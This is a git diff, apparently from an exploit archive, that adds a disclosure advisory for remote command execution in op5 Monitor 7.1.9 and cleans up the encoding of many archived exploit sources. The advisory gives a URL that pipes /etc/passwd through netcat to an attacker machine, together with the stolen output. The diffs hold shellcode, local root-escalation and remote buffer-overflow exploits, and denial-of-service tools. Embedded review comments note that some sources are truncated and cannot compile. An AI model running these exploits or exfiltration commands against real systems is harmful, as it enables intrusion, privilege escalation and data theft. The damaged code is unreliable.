@@ -0,0 +1,138 @@ +[+] Credits: hyp3rlinx + +[+] Website: http://hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt + + +Vendor: +============ +www.op5.com + + +Product: +=========== +op5 v7.1.9 + +op5 Monitor is a software product for server, Network monitoring and +management based on the open source Project Nagios. + + +Vulnerability Type: +======================== +Remote Command Execution + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +op5 has a CSRF entry point that can be used to execute arbitrary remote +commands on op5 system sent via HTTP GET requests, allowing attackers +to completely takeover the affected host, to be victimized a user must be +authenticated and visit a malicious webpage or click an infected link... + +Reference: +https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/ + + +Exploit code(s): +=============== + +trivial RCE cat /etc/passwd... using netcat + +nc.exe -vvlp 5555 > passwds.txt + +https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%205555 + + + +result: + +listening on [any] 5555 ... 
+192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA +connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT + sent 0, rcvd 1343 + +C:\netcat-win32-1.12>type passwds.txt +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +abrt:x:173:173::/etc/abrt:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +smstools:x:499:499::/var/lib/smstools:/bin/bash +postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash +op5lsu:x:500:500::/home/op5lsu:/bin/bash +saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin +postfix:x:89:89::/var/spool/postfix:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +monitor:x:299:48::/opt/monitor:/bin/bash +ntp:x:38:38::/etc/ntp:/sbin/nologin +mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +tcpdump:x:72:72::/:/sbin/nologin + + + +Disclosure Timeline: +============================================ +Vendor Notification: March 27, 2016 +Vendor confirms vulnerability March 27, 2016 +Vendor issue patched new release v7.2.0 April 5, 2016 +April 6, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +High + + +Description: 
+================================================================= + + +Request Method(s): [+] GET + + +Vulnerable Product: [+] op5 v7.1.9 + + +Vulnerable Parameter(s): [+] 'cmd_str' + +================================================================= + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git a/platforms/sco/local/19654.pl b/platforms/sco/local/19654.pl index 489554b2d..7a4c75315 100755 --- a/platforms/sco/local/19654.pl +++ b/platforms/sco/local/19654.pl @@ -33,21 +33,21 @@ ed # ########################################################### -$ui_source =3D "/home/xnec/ui.c"; -$ui_dest =3D "/home/xnec/ui"; -$ui_code =3D "void main() { setreuid(0,0); system(\"/bin/ksh\");}"; -$privloc =3D "/etc/security/tcb/privs"; -$uidatafile=3D"/tmp/uidata"; -$sumpath =3D "/usr/bin/sum"; -$uidata_sym =3D "/tmp/uidata.tmp"; -$compiler =3D "cc"; -$uidadmin =3D "/usr/bin/uidadmin"; +$ui_source = "/home/xnec/ui.c"; +$ui_dest = "/home/xnec/ui"; +$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}"; +$privloc = "/etc/security/tcb/privs"; +$uidatafile="/tmp/uidata"; +$sumpath = "/usr/bin/sum"; +$uidata_sym = "/tmp/uidata.tmp"; +$compiler = "cc"; +$uidadmin = "/usr/bin/uidadmin"; ### # Path to the directory where your $uidata_sym will exist relative to # /etc/uidata/ ### -$uidadminarg =3D "../../tmp"; +$uidadminarg = "../../tmp"; print("\n* uidadmin exploit for UnixWare 7.1 \n\n"); 
@@ -69,20 +69,20 @@ if ( -e $ui_dest ) { # stat $ui_dest for size in bytes and ctime (seconds since epoch) ### -$size=3D(stat($ui_dest))[7] || die "cannot stat $ui_dest"; -$ctime=3D(stat($ui_dest))[10]; -print("$ui_dest size=3D$size ctime=3D$ctime\n"); +$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest"; +$ctime=(stat($ui_dest))[10]; +print("$ui_dest size=$size ctime=$ctime\n"); ### # get the checksum value for $ui_dest ### open(SUM, "$sumpath -r $ui_dest|"); -$checksum=3D; +$checksum=; chomp($checksum); -@sumfields=3Dsplit(' ', $checksum); -$chksum =3D @sumfields[0]; -$chksum =3D~ s/^0//; +@sumfields=split(' ', $checksum); +$chksum = @sumfields[0]; +$chksum =~ s/^0//; print("$ui_dest checksum is $chksum\n"); @@ -90,7 +90,7 @@ print("$ui_dest checksum is $chksum\n"); # Put our entry into $uidatafile, use trailing newline ### -$uidata=3D"$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest"; +$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest"; print("placing '$uidata' into $uidatafile\n"); open(TMP, ">$uidatafile"); print(TMP "$uidata\n"); @@ -113,9 +113,9 @@ c ### open (PRIV, "$privloc"); -@privs =3D ; +@privs = ; foreach $priv (@privs) { - if ($priv =3D~ /$ui_dest/) { + if ($priv =~ /$ui_dest/) { print("Exploit successful. Run $ui_dest after reboot for rootshell \n"); exit(0); @@ -130,7 +130,7 @@ print("Exploit not successful, sorry!\n"); bash-2.02$ id = -uid=3D106(xnec) gid=3D1(other) +uid=106(xnec) gid=1(other) bash-2.02$ ls -la /etc/hosts.equiv UX:ls: ERROR: Cannot access /etc/hosts.equiv: No such file or directory bash-2.02$ ls -la /usr/bin/uidadmin diff --git a/platforms/sco/local/19656.c b/platforms/sco/local/19656.c index 932855840..42dc1ec9d 100755 --- a/platforms/sco/local/19656.c +++ b/platforms/sco/local/19656.c 
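Review bot: `$checksum=;` and `@privs = ;` on the new side are not valid Perl; the readline operand between `=` and `;` appears to have been stripped before this file was imported (consistent with angle-bracket removal by an HTML sanitiser), and this commit normalises the `=3D` around the gap without restoring it. The same stripping is visible as bare `#include` lines in the 19656.c, 19674.c and 19872.c hunks and, in 19872.c, as the mangled `for (a = 0; a > 8;` loop whose body was lost, so those sources cannot compile as archived. Since the damage predates this commit, the honest fix is either a note in the commit message that these files are known-truncated or a separate commit restoring them from the original advisories.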
@@ -21,7 +21,7 @@ This is exploitable to gain root privileges even though /usr/X/bin/xauto is not #include #include -char scoshell[]=3D /* UnixWare 7.1 shellcode runs /tmp/ui */ +char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; @@ -38,7 +38,7 @@ void buildui() { FILE *fp; char cc[100]; - fp =3D fopen("/tmp/ui.c", "w"); + fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); @@ -49,17 +49,17 @@ void buildui() { int main(int argc, char *argv[]) { = - long int offset=3D0; + long int offset=0; = int i; - int egglen =3D EGGLEN; + int egglen = EGGLEN; int retlen; long int addr; char egg[EGGLEN]; char ret[RETLEN]; // who needs __asm__? Per Solar Designer's suggestion - unsigned long sp =3D (unsigned long)&sp; = + unsigned long sp = (unsigned long)&sp; = buildui(); @@ -68,22 +68,22 @@ int main(int argc, char *argv[]) { exit(0); = } - else if (argc =3D=3D 2){ - offset=3Datoi(argv[1]); - retlen=3DRETLEN; + else if (argc == 2){ + offset=atoi(argv[1]); + retlen=RETLEN; } - else if (argc =3D=3D 3) { - offset=3Datoi(argv[1]); - retlen=3Datoi(argv[2]); = + else if (argc == 3) { + offset=atoi(argv[1]); + retlen=atoi(argv[2]); = } else { - offset=3D9400; - retlen=3D2000; + offset=9400; + retlen=2000; = } - addr=3Dsp + offset; + addr=sp + offset; = fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid @@ -96,12 +96,12 @@ int main(int argc, char *argv[]) { memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); = - for(i=3DALIGN;i< retlen-4;i+=3D4) - *(int *)&ret[i]=3Daddr; = + for(i=ALIGN;i< retlen-4;i+=4) + *(int *)&ret[i]=addr; = = - memcpy(egg, "EGG=3D", 4); + memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); = 
diff --git a/platforms/sco/local/19674.c b/platforms/sco/local/19674.c index 40ca1376b..1dae24a33 100755 --- a/platforms/sco/local/19674.c +++ b/platforms/sco/local/19674.c @@ -29,7 +29,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g ** When you "run" and break at _init, change your EIP ** to something between 0x8046000 and 0x8048000 with = - ** "set $eip =3D 0x8046b75" and "continue" twice. + ** "set $eip = 0x8046b75" and "continue" twice. ** ** ** Brock Tellier btellier@usa.net @@ -40,7 +40,7 @@ When a program that is listed in the /etc/security/tcb/privs is executed it is g #include #include -char scoshell[]=3D /* This isn't a buffer overflow! really! */ +char scoshell[]= /* This isn't a buffer overflow! really! */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; @@ -66,11 +66,11 @@ void usage(int ftype) { void buildsm(int ftype) { FILE *fp; char cc[100]; - fp =3D fopen("/tmp/sm.c", "w"); + fp = fopen("/tmp/sm.c", "w"); - if (ftype =3D=3D 1) fprintf(fp, DACREAD); - else if(ftype =3D=3D 2) fprintf(fp, DACWRITE); - else if(ftype =3D=3D 3) fprintf(fp, SETUID); + if (ftype == 1) fprintf(fp, DACREAD); + else if(ftype == 2) fprintf(fp, DACWRITE); + else if(ftype == 3) fprintf(fp, SETUID); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c"); @@ -81,20 +81,20 @@ void buildsm(int ftype) { int main(int argc, char *argv[]) { int i; -int buflen =3D LEN; +int buflen = LEN; char buf[LEN]; = -int filetype =3D 0; +int filetype = 0; char filebuf[20]; = - if(argc > 2 || argc =3D=3D 1) { + if(argc > 2 || argc == 1) { usage(filetype); exit(0); = } - if ( argc > 1 ) filetype=3Datoi(argv[1]); + if ( argc > 1 ) filetype=atoi(argv[1]); if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); } buildsm(filetype); 
@@ -104,9 +104,9 @@ fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); memset(buf,NOP,buflen); memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell)); -memcpy(buf, "XNEC=3D", 5); +memcpy(buf, "XNEC=", 5); putenv(buf); -buf[buflen - 1] =3D 0; +buf[buflen - 1] = 0; system("/bin/sh"); exit(0); diff --git a/platforms/solaris/local/19529.c b/platforms/solaris/local/19529.c index c1faa358f..b19764c10 100755 --- a/platforms/solaris/local/19529.c +++ b/platforms/solaris/local/19529.c @@ -8,7 +8,7 @@ A buffer overflow vulnerability in the '/usr/bin/mail' program's handling of the * Shellcode by Cheez Whiz (fixes problem with shells dropping egid if it= doesn't match your real gid) - * Will set gid=3D6(mail) + * Will set gid=6(mail) * * gcc -o mailex solx86gid.c * /usr/bin/mail -m `./mailex 0 1975 2285` foo @@ -31,7 +31,7 @@ doesn't match your real gid) #define NOP 0x90 -char shell[] =3D +char shell[] = /* 0 */ "\xeb\x45" /* jmp springboard */ /* syscall: */ /* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */ @@ -90,29 +90,29 @@ main (int argc, char *argv[]) if (argc > 1) - offset =3D strtol(argv[1], NULL, 0); + offset = strtol(argv[1], NULL, 0); if (argc > 2) - nop =3D strtoul(argv[2], NULL, 0); + nop = strtoul(argv[2], NULL, 0); else - nop =3D 285; + nop = 285; if (argc > 3) - buflen=3Datoi(argv[3]); + buflen=atoi(argv[3]); else = - buflen=3DBUF; + buflen=BUF; = - esp =3D get_esp(); + esp = get_esp(); memset(buf, NOP, buflen); memcpy(buf+nop, shell, strlen(shell)); - for (i =3D nop+strlen(shell); i < buflen-4; i +=3D 4) - *((int *) &buf[i]) =3D esp+offset; + for (i = nop+strlen(shell); i < buflen-4; i += 4) + *((int *) &buf[i]) = esp+offset; - for (i =3D 0; i < strlen(buf); i++) putchar(buf[i]); + for (i = 0; i < strlen(buf); i++) putchar(buf[i]); return; } diff --git a/platforms/solaris/local/19872.c b/platforms/solaris/local/19872.c index 0b4756107..2f8988612 100755 --- a/platforms/solaris/local/19872.c +++ b/platforms/solaris/local/19872.c 
@@ -1,8 +1,9 @@
+
 source: http://www.securityfocus.com/bid/1138/info
 A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
-/*=20
+/*
 *
 * solaris 2.7 lpset local exploit, i386.
 * discovered by: duke
@@ -21,7 +22,7 @@ A vulnerability exists in the handling of the -r option to the lpset program, as
 #include
 #include
-char shellcode[] =3D
+char shellcode[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
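Review bot: The advisory header of 19872.c is left outside any comment: this hunk appears to add only a blank line at the top and turns `/*=20` into `/*`, so `source: http://www.securityfocus.com/bid/1138/info` and the `A vulnerability exists …` paragraph still precede the opening `/*`, while the same commit wraps the equivalent header of 19720.c in `/*` … `*/`. The two files should be treated alike; for this one that means a `/*` line before `source:` and a `*/` line after the paragraph, leaving the original author's `/*` banner untouched. The removed `/*=20` also shows that trailing `=20` (an encoded space) is part of what this clean-up targets, so the remaining `=20` occurrences elsewhere in the commit deserve the same treatment.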
@@ -33,36 +34,36 @@ long get_esp() { __asm__("movl %esp,%eax"); } int main (int argc, char *argv[]) { - long offset=3D410; - int nop=3D64; - int gab=3D40; + long offset=410; + int nop=64; + int gab=40; long addr; char buffer[210]; int i, a, b; -if (argc > 1) offset =3D strtol(argv[1], NULL, 0); -if (argc > 2) gab =3D strtol(argv[2], NULL, 0); -if (argc > 3) nop =3D strtol(argv[2], NULL, 0); +if (argc > 1) offset = strtol(argv[1], NULL, 0); +if (argc > 2) gab = strtol(argv[2], NULL, 0); +if (argc > 3) nop = strtol(argv[2], NULL, 0); - for (a =3D 0; a > 8; - buffer[a++] =3D (addr & 0x00ff0000) >> 16; - buffer[a++] =3D (addr & 0xff000000) >> 24; + buffer[a++] = addr & 0x000000ff; + buffer[a++] = (addr & 0x0000ff00) >> 8; + buffer[a++] = (addr & 0x00ff0000) >> 16; + buffer[a++] = (addr & 0xff000000) >> 24; for ( ; a < nop; a++) - buffer[a] =3D 0x90; + buffer[a] = 0x90; - for (b =3D 0; b < strlen(shellcode); b++, a++) - buffer[a] =3D shellcode[b]; + for (b = 0; b < strlen(shellcode); b++, a++) + buffer[a] = shellcode[b]; - buffer[strlen(buffer)] =3D '\0'; + buffer[strlen(buffer)] = '\0'; - printf("addr =3D 0x%x\n", addr); + printf("addr = 0x%x\n", addr); execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL); } \ No newline at end of file diff --git a/platforms/unix/local/22335.pl b/platforms/unix/local/22335.pl index 4691a121b..5b6855ec7 100755 --- a/platforms/unix/local/22335.pl +++ b/platforms/unix/local/22335.pl 
@@ -5,30 +5,30 @@ It has been reported that a buffer overflow exists in Tower Toppler. A local use #!/usr/bin/perl #kokanin@dtors.net playing a game #hi bob -$len =3D 1024; -$ret =3D 0xbfbffd31; -$nop =3D "\x90"; -$offset =3D 0; -$shellcode =3D = +$len = 1024; +$ret = 0xbfbffd31; +$nop = "\x90"; +$offset = 0; +$shellcode = = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9\x9d; -if (@ARGV =3D=3D 1) { - $offset =3D $ARGV[0]; +if (@ARGV == 1) { + $offset = $ARGV[0]; } =20 -for ($i =3D 0; $i < ($len - length($shellcode) - 100); $i++) { - $buffer .=3D $nop; +for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { + $buffer .= $nop; } =20 -$buffer .=3D $shellcode; +$buffer .= $shellcode; -$new_ret =3D pack('l', ($ret + $offset)); +$new_ret = pack('l', ($ret + $offset)); =20 -for ($i +=3D length($shellcode); $i < $len; $i +=3D 4) { - $buffer .=3D $new_ret; +for ($i += length($shellcode); $i < $len; $i += 4) { + $buffer .= $new_ret; } -local($ENV{'EGG'}) =3D $buffer;=20 -local($ENV{'DISPLAY'}) =3D $new_ret x 64;=20 +local($ENV{'EGG'}) = $buffer;=20 +local($ENV{'DISPLAY'}) = $new_ret x 64;=20 exec("toppler 2>/dev/null"); \ No newline at end of file diff --git a/platforms/unixware/remote/19705.c b/platforms/unixware/remote/19705.c index 524babdf9..b8dcb43b2 100755 --- a/platforms/unixware/remote/19705.c +++ b/platforms/unixware/remote/19705.c @@ -31,7 +31,7 @@ The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnera #define NOP 0x90 #define LEN 102 -char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */ +char shell[] = /* Cheez Whiz, cheezbeast@hotmail.com */ "\xeb\x5f" /* jmp springboard */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */ "\xc3" /* ret */ @@ -78,7 +78,7 @@ char shell[] =3D /* Cheez Whiz, cheezbeast@hotmail.com */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */ "\x2d\x63\xff"; /* DATA */ -char *auth=3D +char *auth= " HTTP/1.0\r\n" "Host: localhost:457\r\n" "Accept: text/html\r\n" 
@@ -89,13 +89,13 @@ char *auth=3D
 char buf[BUFLEN];
 char exploit[BUFLEN];
-char *cmd =3D "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
+char *cmd = "/usr/X/bin/xterm${IFS}-display${IFS}unix:0.0";
 int len,i,sock;
-int size =3D 368;
-int offset=3D300;
-int port =3D 457;
-long sp =3D 0xbffc6004;
-//unsigned long sp =3D (unsigned long)&sp;
+int size = 368;
+int offset=300;
+int port = 457;
+long sp = 0xbffc6004;
+//unsigned long sp = (unsigned long)&sp;
 struct sockaddr_in sock_a;
 struct hostent *host;
@@ -106,20 +106,20 @@ void main (int argc, char *argv[]) {
 fprintf(stderr, "Error:Usage: %s \n", argv[0]);
 exit(0);
 }
- if(argc > 2) offset=3Datoi(argv[2]);
- if(argc > 3) size=3Datoi(argv[3]);
+ if(argc > 2) offset=atoi(argv[2]);
+ if(argc > 3) size=atoi(argv[3]);
 =
- sp =3D sp + offset;
+ sp = sp + offset;
 memset(exploit, NOP, size - strlen(shell) - strlen(cmd)- 6);
 /* put size of *cmd into shellcode */
- len =3D strlen(cmd); len++; len =3D -len;
- shell[LEN+0] =3D (len >> 0) & 0xff;
- shell[LEN+1] =3D (len >> 8) & 0xff;
- shell[LEN+2] =3D (len >> 16) & 0xff;
- shell[LEN+3] =3D (len >> 24) & 0xff;
+ len = strlen(cmd); len++; len = -len;
+ shell[LEN+0] = (len >> 0) & 0xff;
+ shell[LEN+1] = (len >> 8) & 0xff;
+ shell[LEN+2] = (len >> 16) & 0xff;
+ shell[LEN+3] = (len >> 24) & 0xff;
 memcpy(exploit+(size-strlen(shell)-strlen(cmd)-6), shell, strlen(shell))=
 ;
@@ -128,37 +128,37 @@ void main (int argc, char *argv[]) {
 =
- exploit[size-5]=3D(sp & 0x000000ff);
- exploit[size-4]=3D(sp & 0x0000ff00) >> 8;
- exploit[size-3]=3D(sp & 0x00ff0000) >> 16;
- exploit[size-2]=3D(sp & 0xff000000) >> 24;
- exploit[size-1]=3D0; =
+ exploit[size-5]=(sp & 0x000000ff);
+ exploit[size-4]=(sp & 0x0000ff00) >> 8;
+ exploit[size-3]=(sp & 0x00ff0000) >> 16;
+ exploit[size-2]=(sp & 0xff000000) >> 24;
+ exploit[size-1]=0; =
 sprintf(buf, "GET /%s %s%s\r\n\r\n", exploit, auth,exploit);
- buf[BUFLEN - 1] =3D 0;
+ buf[BUFLEN - 1] = 0;
 fprintf(stderr, "httpd remote exploit for UnixWare 7.1\n");
 fprintf(stderr, "using addr 0x%x offset %d\n", sp, offset);
 fprintf(stderr, "Brock Tellier btellier@usa.net\n");
- if((host=3D(struct hostent *)gethostbyname(argv[1])) =3D=3D NULL) {
+ if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
 perror("gethostbyname"); =
 exit(-1);
 } =
- if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
+ if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
 perror("create socket");
 exit(-1);
 }
- sock_a.sin_family=3DAF_INET;
- sock_a.sin_port=3Dhtons(port);
+ sock_a.sin_family=AF_INET;
+ sock_a.sin_port=htons(port);
 memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
- if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=3D0) {
+ if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
 perror("create connect");
 exit(-1);
 }
diff --git a/platforms/windows/dos/19720.c b/platforms/windows/dos/19720.c
index 48903d9e7..7dc8ae0cc 100755
--- a/platforms/windows/dos/19720.c
+++ b/platforms/windows/dos/19720.c
@@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/925/info Winamp, a program for playing mp3 and other audio files, uses playlist files (*.pls) to store lists of files for playback. The code that reads these files has an unchecked buffer which can be overflowed to cause arbitrary code to be executed. If an entry longer than 580 bytes is specified in the file, EIP gets overwritten. This vulnerability can only be exploited remotely by convincing someone to download the hostile playlist and load it into Winamp. IE5 will download .pls files without user confirmation if winamp is installed. +*/ /* Stack based buffer overflow exploit for Winamp v2.10 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net @@ -28,8 +30,8 @@ int main() printf("\t\t.......................................\n\n"); char buffer[640]; -char eip[8] =3D "\xF7\xCF\xB9\xBF"; -char sploit[256] =3D = +char eip[8] = "\xF7\xCF\xB9\xBF"; +char sploit[256] = = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\= xFA\x2E\xC6 @@ -43,22 +45,21 @@ xEC\xBA\xFF FILE *file; - for(int x=3D0;x<580;x++) + for(int x=0;x<580;x++) { - buffer[x] =3D 0x90; + buffer[x] = 0x90; } -file =3D fopen("crAsh.pls","wb"); +file = fopen("crAsh.pls","wb"); fprintf(file, "[playlist]\n"); -fprintf(file, "File1=3D"); +fprintf(file, "File1="); fprintf(file, "%s", buffer); fprintf(file, "%s", eip); fprintf(file, "%s", sploit); -fprintf(file, "\nNumberOfEntries=3D1"); +fprintf(file, "\nNumberOfEntries=1"); fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; } - diff --git a/platforms/windows/dos/19806.c b/platforms/windows/dos/19806.c index 9735cd3a2..306b3bbab 100755 --- a/platforms/windows/dos/19806.c +++ b/platforms/windows/dos/19806.c 
@@ -35,16 +35,16 @@ main (int argc, char **argv)
 struct hostent *he;
 fprintf (stderr,
- "\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\n");
+ "\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");
 if (argc < 2)
 usage (argv[0]);
- type =3D 0;
+ type = 0;
 if (argc > 2)
- type =3D atol (argv[2]);
+ type = atol (argv[2]);
- ptr =3D buffer;
+ ptr = buffer;
 switch (type)
 {
 case 1:
@@ -76,38 +76,38 @@ buffer);
 break;
 }
- if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
+ if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
 {
 perror ("socket()");
 return -1;
 }
- if ((he =3D gethostbyname (argv[1])) !=3D NULL)
+ if ((he = gethostbyname (argv[1])) != NULL)
 {
- ip =3D *(unsigned long *) he->h_addr;
+ ip = *(unsigned long *) he->h_addr;
 }
 else
 {
- if ((ip =3D inet_addr (argv[1])) =3D=3D NULL)
+ if ((ip = inet_addr (argv[1])) == NULL)
 {
 perror ("inet_addr()");
 return -1;
 }
 }
- sin.sin_family =3D AF_INET;
- sin.sin_addr.s_addr =3D ip;
+ sin.sin_family = AF_INET;
+ sin.sin_addr.s_addr = ip;
 switch (type)
 {
 case 1:
- sin.sin_port =3D htons (110);
+ sin.sin_port = htons (110);
 break;
 case 2:
- sin.sin_port =3D htons (25);
+ sin.sin_port = htons (25);
 break;
 default:
- sin.sin_port =3D htons (143);
+ sin.sin_port = htons (143);
 break;
 }
diff --git a/platforms/windows/dos/21830.py b/platforms/windows/dos/21830.py
index 029fbcb08..e02625d2a 100755
--- a/platforms/windows/dos/21830.py
+++ b/platforms/windows/dos/21830.py
@@ -7,8 +7,8 @@ vulnerability
 # Tested on: windows 7 Ultimate k
 # Language : python
-f =3D open("hack.avi", "wb")
-data =3D "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
+f = open("hack.avi", "wb")
+data = "\x52\x49\x46\x46\xca\x67\x41\x03\x41\x56\x49\x20\x4c\x49\x53\x54=
 " \
 "\xc0\x00\x00\x00\x68\x64\x72\x6c\x61\x76\x69\x68\x38\x00\x00\x00" = \
@@ -41,7 +41,7 @@ f.write(data)
 for i in range(0, 0x71a):
 f.write("\x00")
-data =3D "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
+data = "\x4c\x49\x53\x54\xee\xbd\x40\x03\x6d\x6f\x76\x69\x30\x30\x64\x62\=
 x3d\x4c\x00"
 f.write(data)
diff --git a/platforms/windows/dos/23234.c b/platforms/windows/dos/23234.c
index b2ccb03be..b15efec91 100755
--- a/platforms/windows/dos/23234.c
+++ b/platforms/windows/dos/23234.c
@@ -41,7 +41,7 @@ SOCKADDR_IN sin;
 char *sav;
 WSADATA wsadata;
-WORD wVersionRequested =3D MAKEWORD (2,0);
+WORD wVersionRequested = MAKEWORD (2,0);
 printf ("- FirsClass Internet Services Remote DoS -\n\n"
 "Discovered & coded by I2S-LAB\n"
@@ -56,7 +56,7 @@ ExitProcess (0);
 if (WSAStartup(wVersionRequested, &wsadata) )
 ExitProcess (0);
-if (!(sav =3D (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
+if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
 {
 printf ("Error ! cannot allocate enough memory.\n");
 ExitProcess (0);
@@ -66,20 +66,20 @@ lstrcat (sav, "GET / HTTP/1.1");
 memset (&sav[14], 'A', PerfectOverwrite - 4);
 lstrcat (sav,"DDDD\r\n\r\n");
-sin.sin_family =3D AF_INET;
-sin.sin_port =3D htons (80);
+sin.sin_family = AF_INET;
+sin.sin_port = htons (80);
-if ( (sin.sin_addr.s_addr=3Dinet_addr (argv[1])) =3D=3D INADDR_NONE)
+if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
 {
 printf ("Incorrect IP Address : %s\n", argv[1]);
 ExitProcess(0);
 }
-sock1 =3D socket (AF_INET, SOCK_STREAM, 0);
+sock1 = socket (AF_INET, SOCK_STREAM, 0);
 printf ("\nconnecting to %s...", argv[1]);
-if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) =3D=3D SOCKET_ERROR )
+if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
 printf ("connection failed!\n");
 else
diff --git a/platforms/windows/dos/28897.txt b/platforms/windows/dos/28897.txt
index 71f5de655..f7803d4f2 100755
--- a/platforms/windows/dos/28897.txt
+++ b/platforms/windows/dos/28897.txt
